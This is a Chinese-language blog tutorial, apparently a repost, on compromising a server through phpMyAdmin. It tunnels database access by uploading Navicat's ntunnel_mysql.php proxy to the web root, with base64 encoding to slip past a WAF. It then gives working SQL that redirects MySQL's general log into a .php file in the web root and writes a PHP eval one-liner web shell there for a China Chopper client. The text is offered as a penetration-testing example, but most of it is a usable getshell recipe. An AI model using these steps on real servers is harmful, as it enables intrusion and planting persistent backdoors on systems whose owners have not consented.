您好,登錄后才能下訂單哦!
這篇文章給大家分享的是有關Phpmyadmin滲透測試的示例的內容。小編覺得挺實用的,因此分享給大家做個參考,一起跟隨小編過來看看吧。
嘗試使用Navicate進行數據庫連接返回禁止遠程連接數據庫:
但是遠程命令執行發現本地3306端口時開放的,于是嘗試通過代理進行連接:
Navicat安裝目錄下上傳ntunnel_mysql.php文件(數據庫的代理腳本)到目標服務器任意web站點目錄(后面getshell后上傳的)
上傳到D:/phpStudy/WWW目錄進行訪問http://XXX/ntunnel_mysql.php 測試成功
進行測試連接:
(此時,在本地打開Navicat配置http連接,這里的通道地址就寫你上面訪問的那個url,說白點兒就是個代理端,勾上使用base64編碼,防止waf從中作祟,然后主機名寫localhost,賬號密碼寫lnmp01本地數據庫用戶的賬號即可,因為要連接lnmp01本地的mysql)
Phpmyadmin Get Shell:
利用日志文件
mysql 5.0版本以上會創建日志文件,修改日志的全局變量,也可以getshell。但是也要對生成的日志有可讀可寫的權限。
set global general_log = "ON"; #當開啟general時,所執行的sql語句都會出現在WIN-30DFNC8L78A.log文件那么,如果修改general_log_file的值,那么所執行的sql語句就會對應生成進而getshell SET global general_log_file='D:/phpStudy/WWW/test1234.php'; #對應就會生成test1234.php文件 select '<?php eval($_POST[2019]);?>'; #將一句話木馬寫入test1234.php文件
菜刀連接:
感謝各位的閱讀!關于“Phpmyadmin滲透測試的示例”這篇文章就分享到這里了,希望以上內容可以對大家有一定的幫助,讓大家可以學到更多知識,如果覺得文章不錯,可以把它分享出去讓更多的人看到吧!
免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。